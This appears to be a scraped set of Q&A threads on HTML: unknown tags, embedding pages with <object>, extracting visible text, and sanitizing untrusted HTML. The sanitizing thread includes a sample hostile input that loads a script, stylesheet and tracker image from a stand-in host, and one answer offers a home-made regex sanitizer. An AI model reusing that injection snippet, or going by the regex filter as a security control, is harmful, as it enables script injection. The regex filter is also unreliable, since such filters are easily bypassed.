I was inspecting today's Google Doodle of Moog Synth, dedicated to Robert Moog,
when I came across the following piece of html code:
<w id=moogk0></w>
<s id=moogk1></s>
<w id=moogk2></w>
<s id=moogk3></s>
(You can view the source & do a Ctrl+F for , you will get it in the first search result).
I googled about s & w tags but found nothing useful except that the s tag is sometimes used to strikeout text but is now deprecated.
Obviously google will not be using deprecated tags but I guess there's a lot more behind this than plain html code. Can anybody explain me the use of this tags? & how does the browser recognise them? & if the browser does not recognise them, whats their use?
The browser doesn't recognise them.
But HTML was designed to ignore what it doesn't recognise, so these are simply not understood by the browser and get ignored. As elements without content, they will not get rendered at all either, though they will be part of the DOM.
However, these can be styled directly as elements in CSS and picked up by Javascript (getElementsByTagName and getElementById etc...).
In short, these elements provide a target for CSS and Javascript without any other impact on display.
Unknown elements are treated as block elements (like div) and can be styled accordingly and be used in scripts.
The tags you are talking about are user created XML tags.
If you need to display dynamic data in your HTML document, it will take a lot of work to edit the HTML each time
the data changes.
With XML, data can be stored in separate XML files. This way you can concentrate on using HTML/CSS for display and layout, and be sure that
changes in the underlying data will
not require any changes to the HTML.
With a few lines of JavaScript code,
you can read an external XML file and
update the data content of your web
page.
Related
I am looking for a simple way to make my website modular and extract common parts that appear often like header and footer into separate files.
In my case, I can not use any server-side includes with e.g. PHP. I also generally would like to avoid including big libraries like JQuery just for such a simple task.
Now I came across https://stackoverflow.com/a/691059/4464570 which suggests to simply use an HTML <object> tag to include another HTML file into a page, like this:
<object data="parts/header.html" type="text/html">header goes here</object>
I might be missing something important here, but to me this way seems to perfectly fit my needs. It is very short and precise, the <object> tag is well supported by all browsers, I don't need to include any big libraries and actually I don't even need any JavaScript, which allows users blocking that to still view the correct page structure and layout.
So are there any disadvantages I'm currently not aware of yet with this approach? The main reason for my doubts is that out of dozens of answers on how to include HTML fragments, only one recommended <object> while all others went for a PHP or JavaScript/JQuery way.
Furthermore, do I have to pay attention to anything special regarding how to put the <object> tag into my main page, or regarding the structure of the file I want to include this way? Like, may the embedded file be a complete HTML document with <!DOCTYPE>, <html>, <head> and <body> or should/must I strip all those structures and leave only the inner HTML elements? Is there anything special about using JavaScript or CSS inside HTML embedded this way?
The use of the <object> tag for HTML content is very similar to the use of an <iframe>. Both just load a webpage as a seperate document inside a frame that itself is the child of your main document.
Frames used to be very popular in the early days of web development, then in the form of the <frame> tag. They are generally frowned upon, however, and you should really use them as little as possible.
Why not to use this technique for displaying your own content
The HTML content in the child frame cannot communicate with the parent. For example, you can't use a script in the parent HTML to communicate with the child and vice versa. That makes it not very useful for serving your own content when you want to display anything but static text.
Why not to use this technique for displaying someone else's content
You can't use it to serve a lot of external content either. Many websites (including eg. SO) send an X-Frame-Options header along with their webpage that has the value SAMEORIGIN. This prevents your content from being loaded and displayed.
OK, I know how to include HTML content from a separate file using the <object> tag. What I can't find any info about is what is allowed/required within the included HTML file. Can said included file merely be some text with some HTML tags, or does it have to be a complete HTML file with headers, <head>, and <body>? How does this appear within the DOM of the original document, if it appears within that DOM at all? Or are the two documents treated entirely separately?
Yes, I know, I could experiment to see what works. However, I know enough about HTML to know that what happens to work, for now, may not be the correct way to do things. I am not expecting anyone to list out all the rules here, but if someone could post some links I would much appreciate it. This is a topic that has proven exceeding difficult to search the internet for.
In 13.5 Notes on embedded documents, I believe I have found the answer to both of my questions. The second paragraph says,
An embedded document is entirely independent of the document in which
it is embedded. For instance, relative URIs within the embedded
document resolve according to the base URI of the embedded document,
not that of the main document. An embedded document is only rendered
within another document (e.g., in a subwindow); it remains otherwise
independent.
So, yes, as both #Quentin and #Sinan said, it would require the embedded .html file to be a complete, valid .html file. And, no, it would not become part of the DOM of the original document.
Thanks to everyone for their prompt assistance. The StackOverflow community continues to amaze me.
<object> is a way to include a generic media object.
An HTML document is an example of such.
The HTML spec doesn't describe a means to provide a fragment of HTML to a browser, only a complete document. There is no standard MIME type for a fragment of HTML.
Therefore: You should use complete HTML documents.
That said, if you are going down that route, you would almost certainly be better off using <iframe> which has a much more featureful and robust set of APIs and documentation surrounding it.
How does this appear within the DOM of the original document, if it appears within that DOM at all?
As an object element. The child nodes of which are whatever alternative content you provide between the start and end tag.
Or are the two documents treated entirely separately?
Yes, much like an iframe.
<object> in HTML5 and <object> in HTML4.
The object element represents external content, which, depending on the type of the content, will either be treated as an image, as a nested browsing context, or as external content to be processed by a plugin.
Motivation from HTML4:
Previous versions of HTML allowed authors to include images (via IMG) and applets (via APPLET). These elements have several limitations:
They fail to solve the more general problem of how to include new and future media types.
The APPLET element only works with Java-based applets. This element is deprecated in favor of OBJECT.
They pose accessibility problems.
To address these issues, HTML 4 introduces the OBJECT element, which offers an all-purpose solution to generic object inclusion. The OBJECT element allows HTML authors to specify everything required by an object for its presentation by a user agent: source code, initial values, and run-time data. In this specification, the term "object" is used to describe the things that people want to place in HTML documents; other commonly used terms for these things are: applets, plug-ins, media handlers, etc. (emphasis mine)
So, basically, <object> elements are pretty generic. The only real condition is that there needs to be some kind of functionality on the client side to render the element.
For example:
<object data="test.html" height="50" width="50"></object>
renders the contents of test.html in a tiny area (no scaling!) with Firefox whereas links just displays [OBJ].
Embedded Content explains what happens when an <object> element is encountered.
Due to the algorithm above, the contents of object elements act as fallback content, used only when referenced resources can't be shown (e.g. because it returned a 404 error). This allows multiple object elements to be nested inside each other, targeting multiple user agents with different capabilities, with the user agent picking the first one it supports. (emphasis mine)
I believe that answers the question of how the <object> enters the DOM. If it were any other way, for example, element ids in included documents could trample on the DOM of the host page.
Regardless of what capabilities you observe in current user agents, you should ensure included HTML documents are well-structured, and valid.
Further down, consider the included example:
In this example, an HTML page is embedded in another using the object element.
<figure>
<object data="clock.html"></object>
<figcaption>My HTML Clock</figcaption>
</figure>
Note the example refers to an HTML page — not a fragment.
Having the HTML of a webpage, what would be the easiest strategy to get the text that's visible on the correspondent page? I have thought of getting everything that's between the <a>..</a> and <p>...</p> but that is not working that well.
Keep in mind as that this is for a school project, I am not allowed to use any kind of external library (the idea is to have to do the parsing myself). Also, this will be implemented as the HTML of the page is downloaded, that is, I can't assume I already have the whole HTML page downloaded. It has to be showing up the extracted visible words as the HTML is being downloaded.
Also, it doesn't have to work for ALL the cases, just to be satisfatory most of the times.
I am not allowed to use any kind of external library
This is a poor requirement for a ‘software architecture’ course. Parsing HTML is extremely difficult to do correctly—certainly way outside the bounds of a course exercise. Any naïve approach you come up involving regex hacks is going to fall over badly on common web pages.
The software-architecturally correct thing to do here is use an external library that has already solved the problem of parsing HTML (such as, for .NET, the HTML Agility Pack), and then iterate over the document objects it generates looking for text nodes that aren't in ‘invisible’ elements like <script>.
If the task of grabbing data from web pages is of your own choosing, to demonstrate some other principle, then I would advise picking a different challenge, one you can usefully solve. For example, just changing the input from HTML to XML might allow you to use the built-in XML parser.
Literally all the text that is visible sounds like a big ask for a school project, as it would depend not only on the HTML itself, but also any in-page or external styling. One solution would be to simply strip the HTML tags from the input, though that wouldn't strictly meet your requirements as you have stated them.
Assuming that near enough is good enough, you could make a first pass to strip out the content of entire elements which you know won't be visible (such as script, style), and a second pass to remove the remaining tags themselves.
i'd consider writing regex to remove all html tags and you should be left with your desired text. This can be done in Javascript and doesn't require anything special.
I know this is not exactly what you asked for, but it can be done using Regular Expressions:
//javascript code
//should (could) work in C# (needs escaping for quotes) :
h = h.replace(/<(?:"[^"]*"|'[^']*'|[^'">])*>/g,'');
This RegExp will remove HTML tags, notice however that you first need to remove script,link,style,... tags.
If you decide to go this way, I can help you with the regular expressions needed.
HTML 5 includes a detailed description of how to build a parser. It is probably more complicated then you are looking for, but it is the recommended way.
You'll need to parse every DOM element for text, and then detect whether that DOM element is visible (el.style.display == 'block' or 'inline'), and then you'll need to detect whether that element is positioned in such a manner that it isn't outside of the viewable area of the page. Then you'll need to detect the z-index of each element and the background of each element in order to detect if any overlapping is hiding some text.
Basically, this is impossible to do within a month's time.
This is a common problem, I'm hoping it's been thoroughly solved for me.
In a system I'm doing for a client, we want to accept HTML from untrusted sources (HTML-formatted email and also HTML files), sanitize it so it doesn't have any scripting, links to external resources, and other security/etc. issues; and then display it safely while not losing the basic formatting. E.g., much as an email client would do with HTML-formatted email, but ideally without repeating the 347,821 mistakes that have been made (so far) in that arena. :-)
The goal is to end up with something we'd feel comfortable displaying to internal users via an iframe in our own web interface, or via the WebBrowser class in a .Net Windows Forms app (which seems to be no safer, possibly less so), etc. Example below.
We recognize that some of this may well muck up the display of the text; that's okay.
We'll be sanitizing the HTML on receipt and storing the sanitized version (don't worry about the storage part — SQL injection and the like — we've got that bit covered).
The software will need to run on Windows Server. COM DLL or .Net assembly preferred. FOSS markedly preferred, but not a deal-breaker.
What I've found so far:
The AntiSamy.Net project (but it appears to no longer be under active development, being over a year behind the main — and active — AntiSamy Java project).
Some code from our very own Jeff Atwood, circa three years ago (gee, I wonder what he was doing...).
The HTML Agility Pack (used by the AntiSamy.Net project above), which would give me a robust parser; then I could implement my own logic for walking through the resulting DOM and filtering out anything I didn't whitelist. The agility pack looks really great, but I'd be relying on my own whitelist rather than reusing a wheel that someone's already invented, so that's a ding against it.
The Microsoft Anti-XSS library
What would you recommend for this task? One of the above? Something else?
For example, we want to remove things like:
script elements
link, img, and such elements that reach out to external resources (probably replace img with the text "[image removed]" or some such)
embed, object, applet, audio, video, and other tags that try to create objects
onclick and similar DOM0 event handler script code
hrefs on a elements that trigger code (even links we think are okay we may well turn into plaintext that users have to intentionally copy and paste into a browser).
__________ (the 722 things I haven't thought of that are the reason I'm looking to leverage something that already exists)
So for instance, this HTML:
<!DOCTYPE html>
<html>
<head>
<title>Example</title>
<link rel="stylesheet" type="text/css" href="http://evil.example.com/tracker.css">
</head>
<body>
<p onclick="(function() { var s = document.createElement('script'); s.src = 'http://evil.example.com/scriptattack.js'; document.body.appendChild(s);)();">
<strong>Hi there!</strong> Here's my nefarious tracker image:
<img src='http://evil.example.com/xparent.gif'>
</p>
</body>
</html>
would become
<!DOCTYPE html>
<html>
<head>
<title>Example</title>
</head>
<body>
<p>
<strong>Hi there!</strong> Here's my nefarious tracker image:
[image removed]
</p>
</body>
</html>
(Note we removed the link and the onclick entirely, and replaced the img with a placeholder. This is just a small subset of what we figure we'll need to strip out.)
This is an older, but still relevant question.
We are using the HtmlSanitizer .Net library, which:
is open-source
is actively maintained
doesn't have the problems like Microsoft Anti-XSS library,
Is unit tested with the
OWASP XSS Filter Evasion Cheat Sheet
is special built for this (in contrast to HTML Agility Pack, which is a parser)
Also on NuGet
I am sensing you would definately need a parser that can generate a XML/DOM source so that you can apply fiter on it to produce what you are looking for.
See if HtmlTidy or Mozilla or HtmlCleaner parsers can help. HtmlCleaner has lot of configurable options which you might also want to look at. Specifically the transform section that allows you to skip the tags you doesn't require.
I would suggest using another approach. If you control the method in which the HTML is viewed I would remove all threats by using a HTML render that doesn't have a ECMA script engine, or any XSS capability. I see you are going to use the built-in WebBrowser object, and rightly so, you want to produce HTML that cannot be used to attack your users.
I recommend looking for a basic HTML display engine. One that cannot parse or understand any of the scripting functionality that would make you vulnerable. All the javascript would just be ignored then.
This does have another problem though. You would need to ensure that the viewer you are using isn't susceptible to other types of attacks.
I suggest looking at http://htmlpurifier.org/. Their library is pretty complete.
Interesting problem, i took some time facing it because there are a lot of things we want to remove from user imput, and even if i do a long list of things to be removed, latter on HTML can evolve and my list would have some holes.
Nonetheless i want users to input some simple things like bold, italic, paragraphs... prety simple.
No doubts the allowed things list is shorter and html can change latter on, that wont make holes on my list unless html stops supports this simple things.
So start thinking otherwise, say just what you allow, with great pain because i'm not an expert on regex (so please some regex people correct me here or improve) i coded this expression and its working form me even before HTML5 arrive.
replace(/(?!<[/]?(b|i|p|br)(\s[^<]*>|[/]>|>))<[^>]*>/gi,"")
(b|i|p|br) <- this is the list of allowed tags, feel free to add some.
this is a startpoint and thats why some regex people should improve to remove also the attributes, like onclick
if i do this:
(?!<[/]?(b|i|p|br)(\s*>|[/]>|>))<[^>]*>
tags with onclick or other stuff will be removed but the corresponding closing tags will remain, and after all we don't want those tags removed we just want to remove the tag attributes.
maybe a second regex pass with
(?!<[^<>\s]+)\s[^</>]+(?=[/>])
am i right? can this be composed into a single pass?
we still have no relation between tags (opening/closing), no great deal till now.
Can the attribute remove be write to remove all not from a white lists? (possibly yes).
a last problem.. when removing tags like script the content remains, its desirable when removing font but not script, well we can do a first pass with
<(script|object|embed)[^>]*>.*</\1>
that will remove certain tags and its content.. but its a black list, meaning you have to keep an eye on it in case html changes.
note: all with "gi"
edit:
joined all the above on this function
String.prototype.sanitizeHTML=function (white,black) {
if (!white) white="b|i|p|br";//allowed tags
if (!black) black="script|object|embed";//complete remove tags
e=new RegExp("(<("+black+")[^>]*>.*</\\2>|(?!<[/]?("+white+")(\\s[^<]*>|[/]>|>))<[^<>]*>|(?!<[^<>\\s]+)\\s[^</>]+(?=[/>]))", "gi");
return this.replace(e,"");
}
-black list -> complete remove tag and content
-white list -> retain tags
other tags are removed but tag content is retained
all attributes of white list tag's (the remaining ones) are removed
still there is place for a white list of attributes (not implemented above) because if i want to preserve IMG then the src must stay... and what about tracking images?
I've got an input so the user can type either html or plain text. When the user copy & paste text from MS Word, for example, it generates a weird html. Then, when you view that topic, you can see the whole page's style is affected. I don't really know if the generated html has unclosed tags or something, but it looks like it does and thus, the style of the page is affected.
Does anybody know how to "isolate" the html of that div(or whatever the container be) from the whole page's style?
Short of showing the content in an IFRAME, you can't really do that. What I usually do in this situation is apply tag stripping logic to the content as it comes in. You really don't want to allow arbitrary HTML from a security perspective, but even if you don't care what your users input, you should be stripping out invalid HTML tags (Word has a habit of creating tags with weird namespace-looking things like o:p) and running something like Tidy over the result to ensure every tag is properly closed. There are a number of Tidy libraries for .NET out there; here's one.
Here's a quick cut-and-paste of how I've done this in the past. Note that the class implements an interface from the project I used it in, but you get the general idea.
Copying text from word can include <style> tags. The only sure way to isolate these styles is to put the input control in an <iframe>
You can either sanitize the input or display it in an IFrame.
It it were me I'd strip all but basic formatting (e.g., bold, italics) and use Tidy. That's what I end up doing, I strip and convert all the CSS styles of word into <strong>, <em>, etc.